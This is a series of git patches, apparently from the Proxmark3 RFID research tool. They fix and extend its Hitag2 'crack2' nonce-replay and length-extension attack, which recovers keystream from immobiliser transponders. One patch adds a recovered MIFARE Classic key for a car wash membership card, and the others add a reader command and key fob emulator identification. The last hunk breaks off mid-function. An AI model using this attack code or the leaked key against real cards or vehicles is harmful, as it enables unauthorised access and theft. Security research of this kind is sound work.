From d9ec99f9033eeadc9f862e4a27fd947df092ecac Mon Sep 17 00:00:00 2001 From: iceman1001 Date: Thu, 16 May 2024 22:49:24 +0200 Subject: [PATCH 001/112] found the bug in a call to hex2binarray() fct which overwrote first 16 bytes of keystream. Fixed loops. Crack2 now generates same data as RFIDLer impl. --- CHANGELOG.md | 1 + armsrc/hitag2.c | 16 +-- armsrc/hitag2_crack.c | 246 ++++++++-------------------------------- client/src/cmdlfhitag.c | 25 ++-- 4 files changed, 73 insertions(+), 215 deletions(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index a88f1896a..3ca56628b 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -3,6 +3,7 @@ All notable changes to this project will be documented in this file. This project uses the changelog in accordance with [keepchangelog](http://keepachangelog.com/). Please use this to write notable changes, which is not the same as git commit log... ## [unreleased][unreleased] +- Fixed `lf hitag crack2` - now works. (@iceman1001) - Fixed wrong use of free() in desfire crypto on arm src, thanks @jlitewski! (@iceman1001) - Added `lf em 4x70 calc` - calculate `frn`/`grn` for a given `key` + `rnd` - Fixed `hf 15 dump` memory leaks (@jlitewski) diff --git a/armsrc/hitag2.c b/armsrc/hitag2.c index e9e8ef6c6..28982043d 100644 --- a/armsrc/hitag2.c +++ b/armsrc/hitag2.c @@ -120,7 +120,7 @@ static void hitag2_init(void) { #define HITAG_FRAME_LEN 20 #define HITAG_FRAME_BIT_COUNT (8 * HITAG_FRAME_LEN) #define HITAG_T_STOP 36 /* T_EOF should be > 36 */ -#define HITAG_T_LOW 8 /* T_LOW should be 4..10 */ +#define HITAG_T_LOW 6 /* T_LOW should be 4..10 */ #define HITAG_T_0_MIN 15 /* T[0] should be 18..22 */ #define HITAG_T_0 20 /* T[0] should be 18..22 */ #define HITAG_T_1_MIN 25 /* T[1] should be 26..30 */ @@ -322,8 +322,6 @@ static void hitag2_handle_reader_command(uint8_t *rx, const size_t rxlen, uint8_ // reader/writer // returns how long it took static uint32_t hitag_reader_send_bit(int bit) { - uint32_t wait = 0; - // Binary pulse length modulation (BPLM) is used to encode the data stream // This means that a transmission of a one takes longer than that of a zero @@ -331,8 +329,8 @@ static uint32_t hitag_reader_send_bit(int bit) { lf_modulation(true); // Wait for 4-10 times the carrier period - lf_wait_periods(8); // wait for 4-10 times the carrier period - wait += 8; + lf_wait_periods(HITAG_T_LOW); // wait for 4-10 times the carrier period + uint32_t wait = HITAG_T_LOW; // Disable modulation, just activates the field again lf_modulation(false); @@ -353,6 +351,7 @@ static uint32_t hitag_reader_send_bit(int bit) { // reader / writer commands // frame_len is in number of bits? static uint32_t hitag_reader_send_frame(const uint8_t *frame, size_t frame_len) { + WDT_HIT(); uint32_t wait = 0; // Send the content of the frame @@ -360,6 +359,7 @@ static uint32_t hitag_reader_send_frame(const uint8_t *frame, size_t frame_len) wait += hitag_reader_send_bit((frame[i / 8] >> (7 - (i % 8))) & 1); } + // Send EOF // Enable modulation, which means, drop the field lf_modulation(true); @@ -373,6 +373,7 @@ static uint32_t hitag_reader_send_frame(const uint8_t *frame, size_t frame_len) // t_stop, high field for stop condition (> 36) lf_wait_periods(HITAG_T_STOP); wait += HITAG_T_STOP; + WDT_HIT(); return wait; } @@ -388,7 +389,7 @@ static uint32_t hitag_reader_send_framebits(const uint8_t *frame, size_t frame_l wait += hitag_reader_send_bit(frame[i]); } - // EOF + // Send EOF // Enable modulation, which means, drop the field // set GPIO_SSC_DOUT to HIGH lf_modulation(true); @@ -406,7 +407,6 @@ static uint32_t hitag_reader_send_framebits(const uint8_t *frame, size_t frame_l wait += HITAG_T_STOP; WDT_HIT(); - return wait; } @@ -2418,7 +2418,7 @@ static void ht2_send(bool turn_on, uint32_t *cmd_start , uint8_t *tx, size_t txlen, bool send_bits) { // Tag specific configuration settings (sof, timings, etc.) HITAG2 Settings -#define T_WAIT_1_GUARD 8 +#define T_WAIT_1_GUARD 7 if (turn_on) { // Wait 50ms with field off to be sure the transponder gets reset diff --git a/armsrc/hitag2_crack.c b/armsrc/hitag2_crack.c index fa14faa2a..2c95dffa3 100644 --- a/armsrc/hitag2_crack.c +++ b/armsrc/hitag2_crack.c @@ -30,6 +30,7 @@ #include "cmd.h" #include "lfadc.h" +// iceman: I have never seen the tag respond with this. Might be something buffer in rfidler. const static uint8_t ERROR_RESPONSE[] = { 0xF4, 0x02, 0x88, 0x9C }; // #define READP0CMD "1100000111" @@ -37,8 +38,8 @@ const static uint8_t read_p0_cmd[] = {1, 1, 0, 0, 0, 0, 0, 1, 1, 1}; // hitag2crack_xor XORs the source with the pad to produce the target. // source, target and pad are binarrays of length len. -static void hitag2crack_xor(uint8_t *target, const uint8_t *source, const uint8_t *pad, uint16_t len) { - for (uint16_t i = 0; i < len; i++) { +static void hitag2crack_xor(uint8_t *target, const uint8_t *source, const uint8_t *pad, size_t len) { + for (size_t i = 0; i < len; i++) { target[i] = source[i] ^ pad[i]; } } @@ -168,14 +169,7 @@ static bool hitag2crack_test_e_p0cmd(uint8_t *keybits, uint8_t *nrar, uint8_t *e // send extended encrypted cmd uint8_t resp[4] = {0}; if (hitag2crack_send_e_cmd(resp, nrar, e_ext_cmd, 40)) { - - // test if it was valid - if (memcmp(resp, ERROR_RESPONSE, 4)) { - return true; - } else { - DbpString("test enc-page0 cmd. got error-response"); - Dbhexdump(4, resp, false); - } + return true; } return false; } @@ -296,114 +290,13 @@ static bool hitag2crack_find_valid_e_cmd(uint8_t *e_cmd, uint8_t *nrar) { return false; } - - typedef struct { uint8_t keybits[2080]; uint8_t uid[32]; uint8_t nrar[64]; uint8_t e_ext_cmd[2080]; - uint8_t ext_cmd[2080]; } PACKED lf_hitag_crack2_t; -// hitag2crack_consume_keystream sends an extended command (up to 510 bits in -// length) to consume keystream. -// keybits is the binarray of keystream bits; -// kslen is the length of keystream; -// ksoffset is a pointer to the current keystream offset (updated by this fn); -// nrar is the 64 bit binarray of the nR aR pair. -//static bool ht2crack_consume_keystream(uint8_t *keybits, int kslen, int *ksoffset) { -/* -static bool ht2crack_consume_keystream(lf_hitag_crack2_t *c2, int kslen, int *ksoffset) { - - // calculate the length of keybits to consume with the extended command. - // 42 = 32 bit response + 10 bit command reserved for next command. conlen - // cannot be longer than 510 bits to fit into the small RWD buffer. - int conlen = kslen - *ksoffset - 42; - if (conlen < 10) { - DbpString("ht2crack_consume_keystream: conlen < 10"); - return false; - } - - // calculate how many repeated commands to send in this extended command. - int numcmds = conlen / 10; - - // xor extended cmd with keybits - hitag2crack_xor(c2->e_ext_cmd, c2->ext_cmd, c2->keybits + *ksoffset, (numcmds * 10)); - - // send encrypted command - size_t n = 0; - uint8_t resp[4]; - if (ht2_tx_rx(c2->e_ext_cmd, numcmds * 10, resp, &n, true, true) != PM3_SUCCESS) { - Dbprintf("ht2crack_consume_keystream: tx/rx cmd failed, got %zu", n); - return false; - } - - // test response - if (memcmp(resp, ERROR_RESPONSE, 4) == 0) { - DbpString("ht2crack_consume_keystream: got error response from card"); - return false; - } - - // dont bother decrypting the response - we already know the keybits - - // update ksoffset with command length and response - *ksoffset += (numcmds * 10) + 32; - - return true; -} -*/ - -// hitag2crack_extend_keystream sends an extended command to retrieve more keybits. -// keybits is the binarray of the keystream bits; -// kslen is a pointer to the current keybits length; -// ksoffset is the offset into the keybits array; -// nrar is the 64 bit binarray of the nR aR pair; -// uid is the 32 bit binarray of the UID. -//static bool ht2crack_extend_keystream(uint8_t *keybits, int *kslen, int ksoffset, uint8_t *nrar, uint8_t *uid) { -/* -static bool ht2crack_extend_keystream(lf_hitag_crack2_t *c2, int *kslen, int ksoffset) { - - // calc number of command iterations to send - int cmdlen = *kslen - ksoffset; - if (cmdlen < 10) { - DbpString("extend_keystream: cmdlen < 10"); - return false; - } - - int numcmds = cmdlen / 10; - - // xor extended cmd with keybits - hitag2crack_xor(c2->e_ext_cmd, c2->ext_cmd, c2->keybits + ksoffset, numcmds * 10); - - // send extended encrypted cmd - size_t n = 0; - uint8_t resp[4]; - if (ht2_tx_rx(c2->e_ext_cmd, numcmds * 10, resp, &n, true, true) != PM3_SUCCESS) { - DbpString("extend_keystream: tx/rx cmd failed"); - Dbhexdump(numcmds * 10, c2->e_ext_cmd, false); - return false; - } - - // test response - if (memcmp(resp, ERROR_RESPONSE, 4) == 0) { - return false; - } - - // convert response to binarray - uint8_t e_response[32]; - hex2binarray((char*)e_response, (char*)resp); - - // recover keystream from encrypted response - hitag2crack_xor(c2->keybits + ksoffset + (numcmds * 10), e_response, c2->uid, 32); - - // update kslen - *kslen = ksoffset + (numcmds * 10) + 32; - - return true; -} -*/ - // hitag2_crack implements the first crack algorithm described in the paper, // Gone In 360 Seconds by Verdult, Garcia and Balasch. // response is a multi-line text response containing the 8 pages of the cracked tag @@ -468,148 +361,103 @@ out: // nrar_hex is the 32 bit nR and aR in hex void ht2_crack2(uint8_t *nrar_hex) { + BigBuf_free(); + uint8_t *e_response = BigBuf_calloc(32); lf_hitag_crack2_t *c2 = (lf_hitag_crack2_t *)BigBuf_calloc(sizeof(lf_hitag_crack2_t)); - lf_hitag_crack_response_t *packet = (lf_hitag_crack_response_t *)BigBuf_calloc(sizeof(lf_hitag_crack_response_t)); g_logging = false; LEDsoff(); set_tracing(false); clear_trace(); - int res = PM3_SUCCESS; - // find the 'read page 0' command and recover key stream // get uid as hexstring uint8_t uid_hex[4]; if (ht2_read_uid(uid_hex, false, false, false) != PM3_SUCCESS) { - res = PM3_EFAILED; - goto out; + BigBuf_free(); + reply_ng(CMD_LF_HITAG2_CRACK_2, PM3_EFAILED, NULL, 0); + return; } hex2binarray_n((char *)c2->uid, (char *)uid_hex, 4); hex2binarray_n((char *)c2->nrar, (char *)nrar_hex, 8); + DbpString("looking for encrypted command"); + // find a valid encrypted command uint8_t e_firstcmd[10]; if (hitag2crack_find_valid_e_cmd(e_firstcmd, c2->nrar) == false) { - res = PM3_EFAILED; - goto out; + BigBuf_free(); + reply_ng(CMD_LF_HITAG2_CRACK_2, PM3_EFAILED, NULL, 0); + return; } + DbpString("looking for encrypted page 0"); + // find encrypted page0 commnd if (hitag2crack_find_e_page0_cmd(c2->keybits, e_firstcmd, c2->nrar, c2->uid) == false) { - res = PM3_EFAILED; - goto out; + BigBuf_free(); + reply_ng(CMD_LF_HITAG2_CRACK_2, PM3_EFAILED, NULL, 0); + return; } - // Now we got 40 bits of keystream in c2->keybits. - + // We got 42 bits of keystream in c2->keybits. // using the 40 bits of keystream in keybits, sending commands with ever - // increasing lengths to acquire 2048 bits of key stream. + // increasing lengths to acquire 2048 bits of key stream. int kslen = 40; + int res = PM3_SUCCESS; - // build extended command - for (int i = 0; i < 208 ; i++) { - memcpy(c2->ext_cmd + (i * 10), read_p0_cmd, 10); - } + while (kslen < 2048 && BUTTON_PRESS() == false) { - DbpString("enter main keystream rec"); - Dbhexdump(160, c2->ext_cmd, false); + hitag2crack_xor(c2->e_ext_cmd, read_p0_cmd, c2->keybits, 10); + hitag2crack_xor(c2->e_ext_cmd + 10, read_p0_cmd, c2->keybits + 10, 10); + hitag2crack_xor(c2->e_ext_cmd + 20, read_p0_cmd, c2->keybits + 20, 10); + hitag2crack_xor(c2->e_ext_cmd + 30, read_p0_cmd, c2->keybits + 30, 10); - DbpString("enter main keystream recover loop"); - - while (kslen < 2048) { - - //int ksoffset = 0; + Dbprintf("Recovered " _YELLOW_("%i") " bits of keystream", kslen); // Get UID if (ht2_read_uid(NULL, true, false, true) != PM3_SUCCESS) { res = PM3_EFAILED; - goto out; + break; } // send nrar and receive (useless) encrypted page 3 value size_t n = 0; if (ht2_tx_rx(c2->nrar, 64, NULL, &n, true, true) != PM3_SUCCESS) { res = PM3_EFAILED; - goto out; - } - - // while we have at least 52 bits of keystream, consume it with - // extended read page 0 commands. - // 52 = 10 (min command len) + 32 (response) + 10 (min command len we'll send) - /* - while ((kslen - ksoffset) >= 52) { - // consume the keystream, updating ksoffset as we go - //if (ht2crack_consume_keystream(c2->keybits, kslen, &ksoffset, c2->nrar) == false) { - if (ht2crack_consume_keystream(c2, kslen, &ksoffset) == false) { - DbpString("ht2crack_consume_keystream failed"); - res = PM3_EFAILED; - goto out; - } - } - // send an extended command to retrieve more keystream, - // updating kslen as we go - if (ht2crack_extend_keystream(c2, &kslen, ksoffset) == false) { - DbpString("ht2crack_extend_keystream failed"); - res = PM3_EFAILED; - goto out; - } - - */ - - // xor extended cmd with keybits - hitag2crack_xor(c2->e_ext_cmd, c2->ext_cmd, c2->keybits, kslen); - - // send extended encrypted cmd - uint8_t resp[4]; - if (ht2_tx_rx(c2->e_ext_cmd, kslen, resp, &n, true, false) != PM3_SUCCESS) { - DbpString("extend_keystream: tx/rx cmd failed"); break; } - // test response - if (memcmp(resp, ERROR_RESPONSE, 4) == 0) { + uint8_t resp[4] = {0}; + res = ht2_tx_rx(c2->e_ext_cmd, kslen, resp, &n, true, false); + if (res != PM3_SUCCESS) { + Dbprintf("tx/rx failed, got %zu (res... %i)", n, res); break; } - // convert response to binarray - uint8_t e_response[32]; - hex2binarray((char *)e_response, (char *)resp); + // convert response to binarray + hex2binarray_n((char *)e_response, (char *)resp, 4); // recover keystream from encrypted response - hitag2crack_xor(c2->keybits + kslen + 40, e_response, c2->uid, 32); + hitag2crack_xor(c2->keybits + kslen, e_response, c2->uid, 32); - // update kslen - kslen += (40 + 32); - - Dbprintf("Recovered " _YELLOW_("%i") " bits of keystream", kslen); + // extented with 30 bits or 3 * 10 read_p0_cmds + hitag2crack_xor(c2->e_ext_cmd + kslen, read_p0_cmd, c2->keybits + kslen, 10); + kslen += 10; + hitag2crack_xor(c2->e_ext_cmd + kslen, read_p0_cmd, c2->keybits + kslen, 10); + kslen += 10; + hitag2crack_xor(c2->e_ext_cmd + kslen, read_p0_cmd, c2->keybits + kslen, 10); + kslen += 10; } - /* - uint8_t *keybitshex = BigBuf_calloc(64); - for (int i = 0; i < 2048; i += 256) { - binarray2hex(c2->keybits + i, 256, keybitshex); - Dbhexdump(256, keybitshex, false); - } - */ - BigBuf_free(); + lf_hitag_crack_response_t *packet = (lf_hitag_crack_response_t *)BigBuf_calloc(sizeof(lf_hitag_crack_response_t)); - // copy UID since we already have it... - memcpy(packet->data, uid_hex, 4); packet->status = 1; - -out: - - /* - DbpString("keybits:"); - Dbhexdump(2080, c2->keybits, false); - DbpString("uid:"); - Dbhexdump(32, c2->uid, false); - DbpString("nrar:"); - Dbhexdump(64, c2->nrar, false); - */ + binarray2hex(c2->keybits, kslen, packet->data); reply_ng(CMD_LF_HITAG2_CRACK_2, res, (uint8_t *)packet, sizeof(lf_hitag_crack_response_t)); + BigBuf_free(); + return; } diff --git a/client/src/cmdlfhitag.c b/client/src/cmdlfhitag.c index 193699b71..5f86d7643 100644 --- a/client/src/cmdlfhitag.c +++ b/client/src/cmdlfhitag.c @@ -2169,7 +2169,7 @@ static int CmdLFHitag2Lookup(const char *Cmd) { static int CmdLFHitag2Crack2(const char *Cmd) { CLIParserContext *ctx; - CLIParserInit(&ctx, "lf hitag lookup", + CLIParserInit(&ctx, "lf hitag crack2", "This command tries to recover 2048 bits of Hitag2 crypto stream data.\n", "lf hitag crack2 --nrar 73AA5A62EAB8529C" ); @@ -2196,7 +2196,7 @@ static int CmdLFHitag2Crack2(const char *Cmd) { memset(&packet, 0, sizeof(packet)); memcpy(packet.NrAr, nrar, sizeof(packet.NrAr)); - PrintAndLogEx(INFO, _YELLOW_("Hitag 2") " - Crack2 (NrAR)"); + PrintAndLogEx(INFO, _YELLOW_("Hitag 2") " - Nonce replay and length extension attack ( Crack2 )"); uint64_t t1 = msclock(); @@ -2205,23 +2205,32 @@ static int CmdLFHitag2Crack2(const char *Cmd) { SendCommandNG(CMD_LF_HITAG2_CRACK_2, (uint8_t *) &packet, sizeof(packet)); // loop - uint8_t attempt = 30; + uint8_t attempt = 50; do { - PrintAndLogEx(INPLACE, "Attack 2 running..."); - fflush(stdout); +// PrintAndLogEx(INPLACE, "Attack 2 running..."); +// fflush(stdout); if (WaitForResponseTimeout(CMD_LF_HITAG2_CRACK_2, &resp, 1000) == false) { attempt--; continue; } -// lf_hitag_crack_response_t *payload = (lf_hitag_crack_response_t *)resp.data.asBytes; if (resp.status == PM3_SUCCESS) { - PrintAndLogEx(NORMAL, " ( %s )", _GREEN_("ok")); + + PrintAndLogEx(SUCCESS, "--------------------- " _CYAN_("Recovered Keystream") " ----------------------"); + lf_hitag_crack_response_t *payload = (lf_hitag_crack_response_t *)resp.data.asBytes; + + for (int i = 0; i < 256; i += 32) { + PrintAndLogEx(SUCCESS, "%s", sprint_hex_inrow(payload->data + i, 32)); + } + PrintAndLogEx(NORMAL, ""); + PrintAndLogEx(SUCCESS, "Nonce replay and length extension attack ( %s )", _GREEN_("ok")); + PrintAndLogEx(HINT, "try running `tools/hitag2crack/crack2/ht2crack2search "); break; } else { - PrintAndLogEx(NORMAL, " ( %s )", _RED_("fail")); + PrintAndLogEx(NORMAL, ""); + PrintAndLogEx(FAILED, "Nonce replay and length extension attack ( %s )", _RED_("fail")); break; } From 676c91baafce5f1a3e611097d54b2cc992ba859a Mon Sep 17 00:00:00 2001 From: Philippe Teuwen Date: Thu, 16 May 2024 23:50:26 +0200 Subject: [PATCH 002/112] pk st25tn --- tools/recover_pk.py | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/tools/recover_pk.py b/tools/recover_pk.py index 5c77ad39e..94b3088a1 100755 --- a/tools/recover_pk.py +++ b/tools/recover_pk.py @@ -180,7 +180,14 @@ def selftests(): 'samples': ["02E3002FCD4038", "E71B844BCE76C8110B36E5B1E1C0410381BD994F226D5C11D84CA6697A5EB572", "02E3002FCD4205", "5BE94577A06BC3030B1B3CECDC846E8128DDF81008DDEECBAF78CE91CDA27DBD", "02E3002FCD44BE", "895EE509DE9D98E2FDAC7ADCC976F24B085D73D063986EF59FE260D9BE08D28C"], - 'pk': "041d92163650161a2548d33881c235d0fb2315c2c31a442f23c87acf14497c0cba"}, + 'pk': "041D92163650161A2548D33881C235D0FB2315C2C31A442F23C87ACF14497C0CBA"}, + + # TruST25 (ST25TN) - KeyID ? + # curve=secp128r1, hash=sha256 - from block 52 in ST25TN, followed by ascii UID + {'name': "ST25TN512/01K TruST25 (ST) / KeyID ?", + 'samples': ["020339A5940000", "A5E968CEDD7278C46F0FF7ECABAD649C229BCA444915D307E69C1945FA95C9C6", + "02643AFD04A000", "0938D86193C603E1B30B17C8117A930205CAC1A8CE88F0EA269FCE2A44244D7B"], + 'pk': "0440004F974F7C76BC8718E523D85FA7B354A9A992BFA966CB8219242F9D274FD6"}, # TruST25 (ST25TV) - KeyID 0x04? # curve=secp128r1, hash=sha256 - from block 63 in ST25TV, starting with KeyID ? From 9787821a53779ae6f43ecafa0d1258dc8caec0b2 Mon Sep 17 00:00:00 2001 From: Victor Cardoso Date: Fri, 17 May 2024 14:57:37 +0100 Subject: [PATCH 003/112] Inside Wash Membership Card in Portugal Just one key is used. The rest of the card is blank. I tested on 3 different cards and got through a hardnested attack. Signed-off-by: Victor Cardoso --- client/dictionaries/mfc_default_keys.dic | 3 +++ 1 file changed, 3 insertions(+) diff --git a/client/dictionaries/mfc_default_keys.dic b/client/dictionaries/mfc_default_keys.dic index 9c9b4a805..2b9c6ba49 100644 --- a/client/dictionaries/mfc_default_keys.dic +++ b/client/dictionaries/mfc_default_keys.dic @@ -2417,3 +2417,6 @@ EC2B9FD483CA # Hotel Intelier Orange - Benicasim, Spain # block 1 - key A 04256CFE0425 + +# InsideWash Membership Card - Portugal +C18063858BB9 From 00407383fe7f3c4bf2667cc369ccfcad0eaa29db Mon Sep 17 00:00:00 2001 From: iceman1001 Date: Mon, 20 May 2024 14:22:55 +0200 Subject: [PATCH 004/112] hitag2 crack1,2 fixes. The error response I never seen, the fct to hex2bin prone to overflows. This should make both attack vectors more stable --- armsrc/hitag2_crack.c | 78 ++++++++++++++++--------------------------- 1 file changed, 28 insertions(+), 50 deletions(-) diff --git a/armsrc/hitag2_crack.c b/armsrc/hitag2_crack.c index 2c95dffa3..ed71e8ad5 100644 --- a/armsrc/hitag2_crack.c +++ b/armsrc/hitag2_crack.c @@ -30,9 +30,6 @@ #include "cmd.h" #include "lfadc.h" -// iceman: I have never seen the tag respond with this. Might be something buffer in rfidler. -const static uint8_t ERROR_RESPONSE[] = { 0xF4, 0x02, 0x88, 0x9C }; - // #define READP0CMD "1100000111" const static uint8_t read_p0_cmd[] = {1, 1, 0, 0, 0, 0, 0, 1, 1, 1}; @@ -114,22 +111,18 @@ static bool hitag2crack_read_page(uint8_t *resp, uint8_t pagenum, uint8_t *nrar, uint8_t e_resp[4]; if (hitag2crack_send_e_cmd(e_resp, nrar, e_cmd, 10)) { - // check if it is valid OBS! - if (memcmp(e_resp, ERROR_RESPONSE, 4)) { + uint8_t e_response[32] = {0}; + uint8_t response[32] = {0}; - uint8_t e_response[32]; - uint8_t response[32]; + // convert to binarray + hex2binarray_n((char *)e_response, (char *)e_resp, 4); + // decrypt response + hitag2crack_xor(response, e_response, keybits + 10, 32); - // convert to binarray - hex2binarray((char *)e_response, (char *)e_resp); - // decrypt response - hitag2crack_xor(response, e_response, keybits + 10, 32); + // convert to hexstring + binarray2hex(response, 32, resp); - // convert to hexstring - binarray2hex(response, 32, resp); - - return true; - } + return true; } return false; @@ -195,6 +188,7 @@ static bool hitag2crack_find_e_page0_cmd(uint8_t *keybits, uint8_t *e_firstcmd, // encrypted command. uint8_t guess[10]; memcpy(guess, e_firstcmd, 10); + if (a) { guess[5] = !guess[5]; guess[0] = !guess[0]; @@ -216,21 +210,17 @@ static bool hitag2crack_find_e_page0_cmd(uint8_t *keybits, uint8_t *e_firstcmd, } // try the guess - uint8_t resp[4]; + uint8_t resp[4] = {0}; if (hitag2crack_send_e_cmd(resp, nrar, guess, 10)) { - // check if it was valid - if (memcmp(resp, ERROR_RESPONSE, 4)) { + // convert response to binarray + // response should been encrypted UID + uint8_t e_uid[32] = {0}; + hex2binarray_n((char *)e_uid, (char *)resp, 4); - // convert response to binarray - // response should been encrypted UID - uint8_t e_uid[32]; - hex2binarray((char *)e_uid, (char *)resp); - - // test if the guess was 'read page 0' command - if (hitag2crack_test_e_p0cmd(keybits, nrar, guess, uid, e_uid)) { - return true; - } + // test if the guess was 'read page 0' command + if (hitag2crack_test_e_p0cmd(keybits, nrar, guess, uid, e_uid)) { + return true; } } } @@ -257,29 +247,15 @@ static bool hitag2crack_find_valid_e_cmd(uint8_t *e_cmd, uint8_t *nrar) { for (uint8_t g = 0; g < 2; g++) { // build binarray - //uint8_t guess[10] = { a, b, c, d, e, 0, g, 0, 0, 0 }; - uint8_t guess[10]; - guess[0] = a; - guess[1] = b; - guess[2] = c; - guess[3] = d; - guess[4] = e; - guess[5] = 0; - guess[6] = g; - guess[7] = 0; - guess[8] = 0; - guess[9] = 0; + uint8_t guess[10] = { a, b, c, d, e, 0, g, 0, 0, 0 }; // send guess - uint8_t resp[4]; + uint8_t resp[4] = {0}; if (hitag2crack_send_e_cmd(resp, nrar, guess, sizeof(guess))) { - // check if it was valid - if (memcmp(resp, ERROR_RESPONSE, 4)) { - // return the guess as the encrypted command - memcpy(e_cmd, guess, 10); - return true; - } + // return the guess as the encrypted command + memcpy(e_cmd, guess, 10); + return true; } } } @@ -374,7 +350,7 @@ void ht2_crack2(uint8_t *nrar_hex) { // find the 'read page 0' command and recover key stream // get uid as hexstring - uint8_t uid_hex[4]; + uint8_t uid_hex[4] = {0}; if (ht2_read_uid(uid_hex, false, false, false) != PM3_SUCCESS) { BigBuf_free(); reply_ng(CMD_LF_HITAG2_CRACK_2, PM3_EFAILED, NULL, 0); @@ -387,7 +363,7 @@ void ht2_crack2(uint8_t *nrar_hex) { DbpString("looking for encrypted command"); // find a valid encrypted command - uint8_t e_firstcmd[10]; + uint8_t e_firstcmd[10] = {0}; if (hitag2crack_find_valid_e_cmd(e_firstcmd, c2->nrar) == false) { BigBuf_free(); reply_ng(CMD_LF_HITAG2_CRACK_2, PM3_EFAILED, NULL, 0); @@ -415,7 +391,7 @@ void ht2_crack2(uint8_t *nrar_hex) { hitag2crack_xor(c2->e_ext_cmd + 20, read_p0_cmd, c2->keybits + 20, 10); hitag2crack_xor(c2->e_ext_cmd + 30, read_p0_cmd, c2->keybits + 30, 10); - Dbprintf("Recovered " _YELLOW_("%i") " bits of keystream", kslen); + Dbprintf("Recovered " _YELLOW_("%4i") " bits of keystream", kslen); // Get UID if (ht2_read_uid(NULL, true, false, true) != PM3_SUCCESS) { @@ -452,6 +428,8 @@ void ht2_crack2(uint8_t *nrar_hex) { kslen += 10; } + Dbprintf("Recovered " _YELLOW_("%4i") " bits of keystream", kslen); + lf_hitag_crack_response_t *packet = (lf_hitag_crack_response_t *)BigBuf_calloc(sizeof(lf_hitag_crack_response_t)); packet->status = 1; From 968bfcd5917b5e8abdf6fd1de56f7bb104ddc835 Mon Sep 17 00:00:00 2001 From: iceman1001 Date: Mon, 20 May 2024 17:47:44 +0200 Subject: [PATCH 005/112] added "lf hitag reader" command --- client/src/cmdlfhitag.c | 37 +++++++++++++++++++++++++++++++++++-- 1 file changed, 35 insertions(+), 2 deletions(-) diff --git a/client/src/cmdlfhitag.c b/client/src/cmdlfhitag.c index 5f86d7643..1a6e314d3 100644 --- a/client/src/cmdlfhitag.c +++ b/client/src/cmdlfhitag.c @@ -826,6 +826,38 @@ static int CmdLFHitagInfo(const char *Cmd) { } static int CmdLFHitagReader(const char *Cmd) { + CLIParserContext *ctx; + CLIParserInit(&ctx, "lf hitag reader", + "Act as a Hitag2 reader. Look for Hitag2 tags until Enter or the pm3 button is pressed\n", + "lf hitag reader\n" + "lf hitag reader -@ -> Continuous mode" + ); + + void *argtable[] = { + arg_param_begin, + arg_lit0("@", NULL, "continuous reader mode"), + arg_param_end + }; + CLIExecWithReturn(ctx, Cmd, argtable, true); + bool cm = arg_get_lit(ctx, 1); + CLIParserFree(ctx); + + if (cm) { + PrintAndLogEx(INFO, "Press " _GREEN_("") " to exit"); + } + + do { + // read UID + uint32_t uid = 0; + if (getHitag2Uid(&uid)) { + PrintAndLogEx(SUCCESS, "UID.... " _GREEN_("%08X"), uid); + } + } while (cm && kbd_enter_pressed() == false); + + return PM3_SUCCESS; +} + +static int CmdLFHitagRd(const char *Cmd) { CLIParserContext *ctx; CLIParserInit(&ctx, "lf hitag read", @@ -1453,7 +1485,7 @@ static int CmdLFHitag2Dump(const char *Cmd) { memcpy(packet.NrAr, nrar, sizeof(packet.NrAr)); - PrintAndLogEx(INFO, _YELLOW_("Hitag 2") " - Challenge mode (NrAR)"); + PrintAndLogEx(INFO, _YELLOW_("Hitag 2") " - Challenge mode (NrAr)"); uint64_t t1 = msclock(); @@ -2404,11 +2436,12 @@ static command_t CommandTable[] = { {"list", CmdLFHitagList, AlwaysAvailable, "List Hitag trace history"}, {"-----------", CmdHelp, IfPm3Hitag, "------------------------ " _CYAN_("General") " ------------------------"}, {"info", CmdLFHitagInfo, IfPm3Hitag, "Hitag 2 tag information"}, + {"reader", CmdLFHitagReader, IfPm3Hitag, "Act line an Hitag 2 reader"}, {"test", CmdLFHitag2Selftest, AlwaysAvailable, "Perform self tests"}, {"-----------", CmdHelp, IfPm3Hitag, "----------------------- " _CYAN_("Operations") " -----------------------"}, // {"demod", CmdLFHitag2PWMDemod, IfPm3Hitag, "PWM Hitag 2 reader message demodulation"}, {"dump", CmdLFHitag2Dump, IfPm3Hitag, "Dump Hitag 2 tag"}, - {"read", CmdLFHitagReader, IfPm3Hitag, "Read Hitag memory"}, + {"read", CmdLFHitagRd, IfPm3Hitag, "Read Hitag memory"}, {"sniff", CmdLFHitagSniff, IfPm3Hitag, "Eavesdrop Hitag communication"}, {"view", CmdLFHitagView, AlwaysAvailable, "Display content from tag dump file"}, {"wrbl", CmdLFHitagWriter, IfPm3Hitag, "Write a block (page) in Hitag memory"}, From 1b387ae90e2380e481887fdf3f1c5b015687854a Mon Sep 17 00:00:00 2001 From: iceman1001 Date: Mon, 20 May 2024 21:26:12 +0200 Subject: [PATCH 006/112] some simple identification tests, will need to expand on the idea later --- CHANGELOG.md | 2 ++ client/src/cmdlfhitag.c | 30 ++++++++++++++++++++++++++++++ 2 files changed, 32 insertions(+) diff --git a/CHANGELOG.md b/CHANGELOG.md index 3ca56628b..a4710aeae 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -3,6 +3,8 @@ All notable changes to this project will be documented in this file. This project uses the changelog in accordance with [keepchangelog](http://keepachangelog.com/). Please use this to write notable changes, which is not the same as git commit log... ## [unreleased][unreleased] +- Change `lf hitag info` - now tries to identify different key fob emulators (@iceman1001) +- Added `lf hitag reader` - act as a Hitag2 reader (@iceman1001) - Fixed `lf hitag crack2` - now works. (@iceman1001) - Fixed wrong use of free() in desfire crypto on arm src, thanks @jlitewski! (@iceman1001) - Added `lf em 4x70 calc` - calculate `frn`/`grn` for a given `key` + `rnd` diff --git a/client/src/cmdlfhitag.c b/client/src/cmdlfhitag.c index 1a6e314d3..1d79fb68f 100644 --- a/client/src/cmdlfhitag.c +++ b/client/src/cmdlfhitag.c @@ -766,6 +766,26 @@ void annotateHitag2(char *exp, size_t size, const uint8_t *cmd, uint8_t cmdsize, void annotateHitagS(char *exp, size_t size, const uint8_t *cmd, uint8_t cmdsize, bool is_response) { } +static const char* identify_transponder_hitag2(uint32_t uid) { + + switch (uid) { + case 0x53505910: + return "IMMO Key emulator"; + break; + case 0x5accc811: + case 0x5accc821: + case 0x5accc831: + case 0x5accc841: + case 0x5accc851: + case 0x5accc861: + case 0x5accc871: + case 0x5accc881: + case 0x5accc891: + case 0x5accc8B1: + return "CN3 Tango Key emulator"; + } + return ""; +} static bool 